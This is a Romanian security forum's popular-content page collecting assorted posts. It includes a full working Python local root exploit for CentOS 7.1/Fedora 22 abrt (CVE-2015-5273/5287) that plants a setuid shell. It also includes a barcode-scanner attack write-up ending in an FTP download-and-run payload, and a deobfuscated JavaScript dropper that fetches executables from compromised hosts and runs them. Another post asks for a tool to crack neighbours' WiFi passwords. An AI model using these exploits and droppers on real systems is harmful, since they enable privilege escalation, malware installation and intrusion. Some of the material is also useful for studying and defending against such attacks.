Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 02/09/16 in all areas

  1. Ban permanent pentru uz exacerbat de prostie.
    7 points
  2. In atentia celor care lucrati pe Upwork: a inceput un individ sa invite mai multe sute de oameni la "interviu" pentru un job de a "vinde" lucruri (fictive) pe ebay. Nu va bagati caci v-o muscati Omul va cere sa folositi conturi proprii de PayPal si Ebay si apoi clientii care nu primesc acele produse dar au dat banii vor trimite chargeback. El deja a primit banii iar voi trebuie sa ii scoateti si va frigeti. Mai jos e textul scamului: Cum va dati seama ca e scam? - vine cu alt nume fata de upwork - vrea sa folositi conturile proprii de ebay - vrea sa aveti minim 15 rating pozitive ca cei carora le "vindeti" sa prinda incredere pe produse scumpe - va cere sa nu aveti limite la paypal - spune ca pentru fiecare item castigati £200 - daca suna prea frumos sa fie adevarat.. cel mai probabil nu-i adevarat - el primeste banii si pana se descalceste treaba dispare - cumparatorul de pe ebay primeste o _!_ si face chargeback si primeste banii inapoi. - voi ramaneti cu datorii bunicele de minim £2000 - omul da un tun de cateva sute de mii si apoi isi vede de viata prin Caraibe ori alte cele
    5 points
  3. BMW, AUDI OR FORD? Why? This is not mindreadersforum.com. Learn to ask a fucking question.
    3 points
  4. Barcode attack technique (Badbarcode) - Drops virustracker Author:数据流@伏宸安全实验室 From:http://drops.wooyun.org/tips/12183 Barcode is everywhere in our daily life, especially in supermarkets, convenience stores and logistics industry. However, is it safe? The barcode attack that @Tk described on PacSec and included in his demo video on twitter are so cool that I bought a scanner for research as well. During my research, I went through all information whether it is at home or abroad, but none covers the possible attack techniques. So here is one. Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines constituted by black bars (abbreviated as bar) and white bars (abbreviated as space) that are with different reflectivity. Here are several common types of barcode: code39, code128, code93, EAN128, EAN13 QR , etc. Most of them are one-dimensional, except for QR which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the one that is most widely used and supports most characters. Normally such attacks will exploit code 128 barcodes. Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery office. A scanner is used to read the information of a barcode. A conventional one often uses infrared ray to do that and its embedded chip outputs the result through processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Amongst Symbol has been acquired by Motorola. You’ll notice that when you pay the bill at the supermarket, the code of goods is displayed on the screen after scanning. Actually many scanners rely on keyboard for input, which means a scanner, in fact, is the equivalent of a keyboard. This is a huge risk. Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes. But, for example, UPC barcode only supports numbers and some may support numbers and letters, while code 128 is widely used because it supports ASCII 0-127 characters and that’s why it is called code 128. Barcode length is adjustable, which may support up to 232 characters. Code 128 can be categorized into 3 groups: Code 128A: Standard numbers and uppercase letters, control characters, special characters Code 128B: Standard numbers and uppercase letters, lowercase letters, special characters Code 128C/EAN 128: number pair collections from [00] to [99], a total of 100, i.e., can only represent digital length of even numbers. Code 128 consists of 4 parts: start code, data code, check code (optional) and end code. As shown above, the barcode has different widths and spacings of parallel lines and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar contains of two units of vertical lines, while the second space contains of one unit of vertical line, so on and so forth. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code. Comparison between start codes: 128A 11010000100 128B 11010010000 128C 11010011100 All end code is always 1100011101011. According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode. In the end, the barcode data can be obtained through analysis based on the encoding table for code128. According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters. Based on the control characters table of ASCII, almost all Ctrl+? Key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used only in certain applications, for example, in a Browser and MS Word. Some of the control characters can be used in some terminals making the program jump out of the sandbox. How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it’s time to write your program. There are also many small programs that can generate barcodes on the Internet. Here I recommend a powerful barcode editor: BarTender. After installation, click “file”-“new”-“finish” and there is a blank template. Then click the barcode button to create your barcode and select code 128. Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs “FutureSec” and outputs Ctrl+O. After scanning, the scanner pops up a dialog box immediately. Almost every scanner can execute it, because code 128 is supported by many scanners. Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners according to the rules you set for each step to customize input data, which can also be viewed as a barcode technique that supports programming. For instance, within a check out system, when you scan a commodity, since check out system is not able to directly process the barcode, this technique is required. Check system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers, in order to be identified by the check out system, it has to be processed before input. Here is another example: Barcode data: 8523647122 Output data from ADF: 8523641 How to implement ADF? There are not any Chinese materials about ADF on the Internet. And only a few appears on some English websites. However, you’ll also be confused by @TK’s introduction about ADF in his PPT because of the lack of details. Later, I found a 300-page ADF guide from Motorola. ADF is a programming method which you may construct based on your need and it uses barcode instead of code for programming. ADF represents all rules by using barcode, such as Prefix/Suffix, Replacement and Character Input. Use ADF to hijack data of a scanner Before set up ADF setting for the scanner, scan the start mode first. Begin new rule. Then the scanned barcode will be added with a rule so long as the logic of the rule is legal. Next scan the following barcodes in order Then save the rule When saving the rule, all output data of the scanner will be hijacked as “TEST”. If you set ADF, your rule will be executed step by step. How to recover it? Clear all barcodes with rule. Since a command will be executed by solely using control characters and ADF supports simple programming and more keys, then system commands can be easily executed by using ADF. ADF supports more keys, for example, the most useful WIN+R. It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed by using the above rule. But this is not enough, because the input is completed by system which is faster than human input. When you reach GUI R and execute “c”, ”m”, “d”, cmd is already entered before the dialog box for win+r pops up. Therefore, time delay is required. And ADF supports it, which equals to sleep() in programming. When inputing the ADF rule, two Numeric are entered as the scanning delay, such as, 0 and 1 which represent a delay of 0.1s; 0 and 5 equal to 0.5, the default values is 1 second. If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands that mainly include Enter. But if you do it as described above, it even requires 10 barcodes to pop a cmd box, which means the scanner has to repeat scanning for 10 times. Here is a demo from Tencent Xuan Wu Lab: https://twitter.com/tombkeeper/status/663730674017300480 In the video, we used a pile of barcodes and scanned them for 10 times in sequence to get a cmd. This probably relates to the model of the scanner. If it’s like this, whether rule generation or exploitation will be troublesome. As a matter of fact, this can be optimized to combine the rules of ADF by using the scanner software-123scan from Motorola. 123scan is a very powerful scanner management software by Motorola available at its official website. This software supports multiple functions. Next part is about how to use 123scan to set up ADF. Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”. Click on Add action to add a rule. All ADF rules are included, including Beep control (control the buzzer for the scanner), Replace, etc. Set a 0.5s delay and add rules in order. Finally, all barcodes will be combined automatically and output. The above is the barcode payload used to execute arbitrary commands. Except the first to set factory settings and the second to clear all rules, it only requires 4 barcodes to execute any single commands. “Send All that remains” represents the original data of barcodes after setting the ADF. Here os the ADF process for the above 4 barcodes: input WIN+R->delay 0.5s->input c->input m->input d->input Carriage Return->delay 0.5s->execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it’s single line command, 4 barcodes will be enough and Send ALL that remains will not be required. Use ADF to plant malware Since cmd commands are to execute, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands. ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR» The next is our demo video that has scanned ADF settings for 4 times. Whatever the barcode executes to Send All that remains. The video shows how to use FTP commands to execute. (Tested model: Symbol-LS4208-SR20001ZZR) http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2 Password: wooyun520 Next is a summary of the possible attack scenarios: 1.Pay a bill Use barcode to replace commodities; Many convenience store supports WeChat, Ali Pay Barcode. The scanner supports multiple types of barcodes and it can scan the barcodes saved in the cell phone. Some markets equip with price query terminals. Use the terminal to scan a special barcode, you’ll be able to jump out of the terminal. 2.Hospital records, testing list Nowadays, the register at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode or you may hand it to a nurse. Almost every hospital has such terminals that can generate testing list by scanning the barcode. 3.Lottery ticket Lottery tickets have barcodes. The inspecting machine requires the barcode to identify this ticket. So it’s possible to forge or attack an inspecting machine, there are many types of lottery terminals. 4.Express list Express lists also use barcode, normally the barcode can be code 128 or code 39. Some self-help pickup cabinets may be risky. There are many other scenarios that I won’t list here. If it’s possible, I’ll find another chance to analyze each scenario. Disable ADF function of the scanner by default. Avoid using keyboard simulation of the scanner. Set up hotkey blacklist. The concept of using barcode to launch attack is raised years ago, but no one digs deep. By using SQL barcode, it’s able to launch SQL injection, XSS and overflow attack. Whatever the device is, once part of the input can be manipulated, it is risky. http://www.appsbarcode.com/code%20128.php http://www.slideshare.net/mobile/PacSecJP/hyperchem-ma-badbarcode-en1109nocommentfinal Sursa
    2 points
  5. Daca il vrei exact pe Extract Any Mail te pot rezolva.
    2 points
  6. [h=1]Centos 7.1/Fedora 22 - abrt Local Root[/h] #!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage # rebel 09/2015 # ---------------------------------------- # [user@localhost ~]$ id # uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # [user@localhost ~]$ cat /etc/redhat-release # CentOS Linux release 7.1.1503 (Core) # [user@localhost ~]$ python abrt-centos-fedora.py # -- lots of boring output, might take a while on a slow connection -- # /var/spool/abrt/abrt-hax-coredump created # executing crashing process.. # success # bash-4.2# id # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 import time,os,datetime,sys,resource,socket fedora = "Fedora" in open("/etc/redhat-release").read() # mkdir dir1 # ln -s /var/spool/abrt dir1/hax # mkdir dir2 # mkdir dir2/hax # ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump # cd dir1 # find . -depth -print | cpio -o > ../cpio1 # cd ../dir2 # find . -depth -print | cpio -o > ../cpio2 cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip") cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip") if fedora: cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt") payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n" # we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries # and we can't control the contents of that region. on 32 bit binaries [stack] is at the end # the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written # to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip") # most people don't have nasm installed so i preassembled it # if you're not brave enough to run the preassembled file, here's the code """ ; abrt-hax.asm ; nasm -f bin -o abrt-hax abrt-hax.asm BITS 32 org 0x08048000 ehdr: ; Elf32_Ehdr db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident times 8 db 0 dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd _start ; e_entry dd phdr - $$ ; e_phoff dd 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum dw 0 ; e_shentsize dw 0 ; e_shnum dw 0 ; e_shstrndx ehdrsize equ $ - ehdr phdr: ; Elf32_Phdr dd 1 ; p_type dd 0 ; p_offset dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd filesize ; p_memsz dd 5 ; p_flags dd 0x1000 ; p_align phdrsize equ $ - phdr _start: inc esp cmp dword [esp],0x706d742f jne l or esp,0xfff inc esp mov edx,500 l3: mov ecx,msglen mov ebx,message sub esp,ecx l2: mov al,[ebx] mov [esp],al inc esp inc ebx loop l2 sub esp,msglen dec edx cmp edx,0 jne l3 mov eax,0x41414141 jmp eax message db '////////tmp/hax.sh',0x0a,0 msglen equ $-message """ build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1] os.chdir("/tmp") open("build_ids","w+").write(build_id + "\n") print build_id def child(): timestamp = int(time.time()) for i in xrange(0,3): try: t = datetime.datetime.fromtimestamp(timestamp+i) d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid()) os.mkdir(d) os.chmod(d,0777) os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio") print "created %s" % d except: pass os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y") try: os.mkfifo("/var/tmp/haxfifo") os.chmod("/var/tmp/haxfifo",0666) except: pass def fifo(a): print "reading from fifo.." open("/var/tmp/haxfifo").read() print "done" print "writing to fifo.." open("/var/tmp/haxfifo","w+").write(a) print "done" if os.fork() == 0: child() print "first cpio..." fifo(cpio1) os.wait() time.sleep(1) if os.fork() == 0: child() print "second cpio..." fifo(cpio2) os.wait() time.sleep(1) if fedora: sym = "/var/tmp/abrt/abrt-hax-coredump" else: sym = "/var/spool/abrt/abrt-hax-coredump" try: os.lstat(sym) except: print "could not create symlink" sys.exit(-1) print "%s created" % sym open("/tmp/abrt-hax","w+").write(elf) os.chmod("/tmp/abrt-hax",0755) if os.fork() == 0: resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,)) print "executing crashing process.." os.execle("/tmp/abrt-hax","",{}) os.wait() time.sleep(1) if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read(): print "could not modify /proc/sys/kernel/modprobe" sys.exit(-1) open("/tmp/hax.sh","w+").write(payload) os.chmod("/tmp/hax.sh",0755) try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132) except: pass time.sleep(0.5) try: os.stat("/tmp/sh") except: print "could not create suid" sys.exit(-1) print "success" os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''') Sursa: https://www.exploit-db.com/exploits/38835/
    2 points
  7. O sa punem la vot mai multe astfel de sugestii. Astfel, veti avea impresia ca e democratie
    2 points
  8. Sunt multi copii aici care printre altele au "liber la internet" si idei de genul le modifica perceptiile sau chiar viitorul. Si eu zic sa ramana doar partea cu atentionarea....
    1 point
  9. Care sunt cerințele jobului? - Să cunoști foarte bine HTML, CSS, Less/Sass, JavaScript (jQuery) - O cerință de bază este reprezentată de faptul că vom avea nevoie des să te ocupi de codarea temelor de WordPress de la 0. Cunoștințele de PHP sunt necesare pentru ca va trebui să construiești și module de WordPress. - Bootstrap și/sau alte CSS Frameworks - Responsive/Adaptive Development - UX/Usability - Cross Browser/Cross- Platform Development - Website Speed/Performance - Debugging Tools (Firebug etc) Jobul va fi unul part-time cu program de 6 ore pe zi. Avantaje? 1) Vei avea posibilitatea de a învăța lucruri noi de la programatori mai experimentați. Începem de la nivelul acesta, dar ne vom asigura că atunci când vei pleca de la noi (bineînțeles, te poți și pensiona de aici:)))), vei fi mândru de felul cum ai evoluat. 2) Vei avea oportunitatea directă de a lucra cu clienți din UK. Te asigur că îți vor plăcea mai mult decât clienții din România:) 3) Oferim flexibilitate destul de mare a acestui program. Și nu o spunem doar așa ca să dea bine în anunț:) De exemplu, dacă ești la facultate și nu poti să vii în fiecare zi timp de 6 ore, putem să construim împreună un program care să te avantajeze. Suntem la birou până la 8 seara, așa că ai suficient de mult timp pentru a te organiza cum îți place mai bine. Dacă simți că ești Creative, dar știi și Coding, Creative Coding poate sună bine pentru tine:) Locația biroului nostru este în București, în Casa Presei Libere. Așteptăm CV-ul tău pe adresa și sperăm să ne poți spune în e-mail câte ceva despre tine: contact@creative-coding.ro Va astept cu bratele deschise, incercarea moarte n-are. Daca aveti alte intrebari sau neclaritati ma puteti contacta si prin PM. EDIT: Putem lua in considerare si modul de lucrul remote. Trimiteti un CV ca sa va avem in evidenta.
    1 point
  10. Salut,mai este valabil anuntul ? Multumesc
    1 point
  11. NU! Ne intereseaza ce stii sa faci, nu ce studii ai terminat.
    1 point
  12. Este ponzi scheme. Nu investiti in OneCoin.
    1 point
  13. N-am avut somn asa ca am analizat distributia literelor din mesajele personale. (al meu si inca unul gasit de google) Logica mea e ca "embracing the random()" inseamna defeating it trough statistics. FYETYBEV AZWTUWWE DZFBWUTW YZWETEAC XDWAUWTY WBYXWXWY FWWZBXXY BZXZXXXC La o prima vedere W-13 X-9 Y-7 (distributia este foarte inegala) si lipsesc (in ambele mesaje analizate) caracterele : GHIJKLMNOPQRS Dupa mine aici ar consta randomul. Caracterele WXYZ sunt fie shiftate fie adaugate aleator in spatiile libere ale Grille. Forta bruta de a asocia litere din matricea 8X8, tinand in calcul si distributia nu mi-a dat mari rezultate pana acum. Daca descopera cineva ceva pe Public Challange care e util si pt private ...
    1 point
  14. Se poate scoate acel indicator? Iese cam tare in evidenta, intra toti prostii pe chat si nu mai sunt destui moderatori care sa se ocupe
    1 point
  15. Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". E un apel de functie cu un anume parametru. Ce se intampla daca afisam acel parametru (n49)? Adica inlocuim "this[h91]" cu "document.write" si: var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; }; PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7.
    1 point
  16. Încearcă asta: http://androidforums.com/threads/guide-how-to-unbrick-upgrade-downgrade-your-sga-gt-s5830.667033/
    1 point
  17. De obicei când scriem pe un forum cuiva sau ne adresam cuiva, spunem și numele acelei persoane! (Quote)
    1 point
  18. Bine că ai luat ban Marconete Happy @rosetzy ?
    1 point
  19. Salut, imi suna a schema piramidala, au avut si conferinte in Romania, m-am documentat acum ceva timp despre el si nu imi inspira incredere, in schimb, ai putea sa investesti in Ethereum si sa studiezi conceptul care sta la baza monedei, este destul de interesant plus ca a avut o crestere considerabila in ultimul timp.
    1 point
  20. Pentru partea de web development, chiar si mobile development e ok sa fii freelancer, dar nu poti sa compari un proiect de freelance cu un proiect facut intr-o companie in care sunt peste 50 de programatori pe respectivul proiect.
    1 point
  21. ^ ar fi bine daca s-ar scoate toate indicatoarele din partea dreapta: Who's Chatting, Topics, Posts, Files. Pentru recent topics, post se poate vedea prima pagina. Parerea mea este ca acum arata prea incarcat. Simple is better :).
    1 point
  22. 1 point
  23. cel mai sigur de pe site-ul producatorului ar fi mai sigur nu?
    1 point
  24. AnandTech: Hardware News and Tech Reviews Since 1997
    1 point
  25. Cum adica sa nu bata la ochi ? Din prima e continut duplicat si bate la ochi...
    1 point
  26. Acest tutorial face parte din continuarea unei serii incepute aici: https://rstforums.com/forum/87361-tut-comenzi-utile-bash-1-a.rst#post560313 Un material pe aceasta tema, de asemenea interesant, se gaseste la: https://rstforums.com/forum/43047-sh0rt-line-c0de.rst mount /cale/catre/imagine.iso /mnt/cdrom <-oloop>) Comanda de mai sus monteaza o imagine .iso intr-un director anume. Optiunea -oloop permite folosirea fisierului(a imaginii) ca un device de tip block. fuser [numar port]/[protocol] Comanda de mai sus gaseste procesul asociat unui port deschis(pid-ul acestuia mai exact). du -hc * Comanda afiseaza spatiul ocupat in Kb/Mb/Gb al unui folder pentru fiecare fisier pe care il contine. In acest exemplu toate fisierele vor fi luate in considerare. python -m smtpd -n -c ServerDebug localhost:2025 Aceasta comanda creeaza un smtp server care asculta pe portul 2025 si permite operatii de depanare. Server-ul afiseaza la iesirea standard(stdout) antetele email(e-mail headers) si corpul mesajelor(email body) perl -pi -e 's/sir1/sir2/g' fisier* Comanda de mai sus inlocuieste in toate fisierele din directorul curent care incep cu string-ul "fisier" cuvintele "sir1" cu "sir2". sed -i 's/sir1/sir2/g' fisier Comanda este asemanatoare cu cea de mai sus. ps auxf Comanda de mai sus listeaza toate procesele active la un moment dat precizand si relatia dintre acestea(care sunt procese de tip parinte si care sunt fiii acestora). netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c Comanda afiseaza numarul si tipul conexiunilor active la un moment dat. for i in */*.rar; do unrar i $i; done for i in *.rar; do unrar i $i; done for i in */*.zip; do unzip i $i; done for i in *.zip; do unzip i $i; done for i in */*.tar.gz; do tar zxvf i $i; done for i in *.tar.gz; do tar zxvf i $i; done for i in */*.tar.bz2; do tar xvjf i $i; done for i in *.tar.bz2; do tar xvjf i $i; done Comenzile de mai sus prezinta mijloace de a dezarhiva mai multe tipuri de arhive(.rar, .zip, .tar.gz, .tar.bz2). Dezarhivarea se poate face pentru toate fisierele de un anumit tip(care au o anumita extensie) din directorul directorul curent: *.extensie(.rar, .zip, .tar.gz, .tar.bz2) sau pentru toate subdirectoarele din directorul curent: */*.extensie(.rar, .zip, .tar.gz, .tar.bz2). Rezultatele vor scrise in directorul din care s-a lansat comanda. for i in `ps aux | grep httpd | awk '{print $2}'`; do lsof -n -p $i | grep ESTABLISHED; done; Comanda de mai sus afiseaza toate legaturile stabilite cu procesul apache. tcpdump -nli eth0; tcpdump -nli eth0 src or dst xx.xx.xx.xx; tcpdump -nli eth0 port 80; tcpdump -nli eth0 proto udp tcpdump permite vizualizarea pachetelor dintr-o retea. Optiunile cele mai comune(utile) sunt: -n afiseaza adrese IP in format numeric(nu ne trebuie numele dns) -l afiseaza o linie imediat ce este gata(nu mai facem procesari aditionale) -i eth0 reprezinta interfata de retea pe care dorim sa monitorizam pachetele src sau dst reprezinta sursa respectiv destinatia pachetelor. Mai sus acestea sunt reprezentate cu xx.xx.xx.xx port 80 urmareste pachete HTTP(de fapt orice este transmis/receptionat pe acest port) proto udp afiseaza doar pachete de tip UDP Putem combina aceste optiuni cu "and" si "not" in functie de cerinte. tr -dc '[:lower:]' < /dev/urandom | head -c 10 Comanda de mai sus genereaza un string de zece caractere printabile dupa care il afiseaza la iesirea standard(stdout). ^u Comanda elimina campurile de parole scrise gresit(acestea de regula nu sunt vizibile). statie_destinatie nc -l 2014 > iesire; statie_sursa nc statie_destinatie 2014 < intrare; Comanda de mai sus lanseaza utilitarul netcat in mod de ascultare pe statia destinatie; tot traficul primit pe portul 2014 este stocat in fisierul iesire. Pe statia sursa netcat citeste un flux de octeti din fisierul intrare dupa care il scrie peste retea statiei destinatie care il va stoca in fisierul iesire situat pe aceasta din urma. Este practic echivalentul uni pipe peste o conexiune TCP. dig rstforums.com mx +short Comanda extrage inregistrarile de tip mai exchange asociate domeniului rstforums.com(adica server-ele de pe care se transmit/receptioneaza email-uri). ldconfig -p Comanda de mai sus arata corespondentele intre bibliotecile partajate(shared library mappings) si un executabil stabilite de catre linker. sshfs nume@server:/cale/catre/imagine /cale/catre/punct/de/montare Comanda face exact ceea ce face mount insa folosind fisiere de pe doua statii diferite(putem folosi aceiasi statie insa ar fi redundant) peste o conexiune SSH. fuser -k numefisier Comanda termina un proces ce mentine un fisier deschis. ps aux | awk '{ print $8 " " $2 " " $11}' | grep -w Z Comanda permite gasirea proceselor zombi(acestea sunt procese care si-au indeplinit functia dar inca pastreaza o intrare in tabela proceselor(process table). Cu alte cuvinte nu mai au un handle prin care se pot inchide(acesta este detinut de procesul parinte). rsync -av --progress ./fisier user@host:/cale/ Comanda permite transmiterea unui fisier local pe o statie la distanta. scp /cale/catre/fisier.txt user@host:/cale/catre/destinatie Comanda de mai sus permite copierea unui fisier local pe o statie la distanta prin SSH. scp -r /cale/catre/director user@host:/cale/catre/destinatie Comanda de mai sus permite copierea unui director si al subdirectoarelor local pe o statie la distanta prin SSH. curl -s http://myip.dk/ | egrep -m1 -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' Comanda afiseaza IP-ul extern al statiei curente.
    1 point
  27. Pana la urma asta nu mai este un forum de copi cu toluri din ce am vazut eu Sunt persoane capabile sa isi foloseasca capul chiar de a gasi vulnerabilitati in program si siteuri importante. Forumuri si locuri de genul se gasesc in afara destule.
    -1 points
  28. am un adaptor wireless si reusesc sa prin semnal wireless de la multe persoane si as vrea sa sparg parola lor. Vreau si eu un program de spart parole pentru windows 7 si daca se poate un progamel mai simplu de utilizat pentru ca sunt incepator.
    -1 points
  29. WordPress - A Comprehensive Training https://www.udemy.com/wordpress-a-comprehensive-training/ tintin JSP - JavaServer Pages https://www.udemy.com/jsp-java-server-pages/?couponCode=TINTIN The Java Spring Training https://www.udemy.com/the-java-spring-training/?couponCode=TINTIN Software Estimation https://www.udemy.com/software-estimation/?couponCode=TINTIN Oracle PL/SQL Tutorials https://www.udemy.com/oracle-plsql-tutorials/?couponCode=TINTIN Professional Trader's Mindset - Complete Forex Course https://www.udemy.com/professional-trader-mindset/ Software Project Management https://www.udemy.com/software-project-management/?couponCode=TINTIN Agile Project Management https://www.udemy.com/agile-project-management-agile/?couponCode=TINTIN SAP - SAP ABAP Module Pool Programming https://www.udemy.com/sap-abap-module-pool-programming/?couponCode=tintin Oracle Database 11g Administration Workshop I https://www.udemy.com/oracle-architecture-i/?couponCode=TINTIN Oracle SQL - Introduction to Oracle SQL https://www.udemy.com/oracle-sql-introduction-to-oracle-sql/?couponCode=TINTIN https://www.udemy.com/asp-dot-net-mvc/ Code:tintin https://www.udemy.com/cbap-certified-business-analysis-professional/ Code:tintin https://www.udemy.com/capm-capm-exam-prep-training/ Code:tintin https://www.udemy.com/software-project-management/ Code:tintin https://www.udemy.com/phonegap/ Code:tintin https://www.udemy.com/sap-abap-smartforms/ Code:tintin Productivity for Mac Users https://www.udemy.com/mac-keyboard-shortcuts/?couponCode=productiveyou# Mobi5: HTML5 and CSS3 for Mobile Web Applications https://www.udemy.com/mobi5-html5-and-css3-for-mobile-web-applications/?couponCode=FriendsOfPaul4 SAP ABAP: Comprehensive Online Training https://www.udemy.com/sap-abap/?couponCode=TINTIN
    -1 points
  30. Buna ziua am si eu o mica problema Am facut un site de anunturi si mar interesa treaba cu seo cand spun seo la ce ma refer, ma intereseaza ca clienti mei cand publica un anunt sa apara pe google , la inceput chiar daca dureaza cateva zile mie indiferent dar sa apara pe prima pagina de google cum asi putea face asa ceva ce fisiere ,trebuie sa modific ?. Trebuie sa le modific la cateva zile Keywords titulu de la pagina esplicatimi folosesc plataforma open www.open-classifieds.com plugin nu poti sa instalez nici nimica asa ca datimi o solutie Ma intereseaza ca Anunturile publicate sa apara pe google intre pagina unu doi sau 3 (acuma va intreb ca nu inteleg ) daca a aparut pe a 5 pagina cum fac sa le aduc pe prima pagina multumesc mult Nu prea am scris gramatical.. adimit ajja nu vreu sa stau sa ascult parerea alcuiva care nu este despre ce am cerut ajutor MULTUMESC MULT
    -2 points
×
×
  • Create New...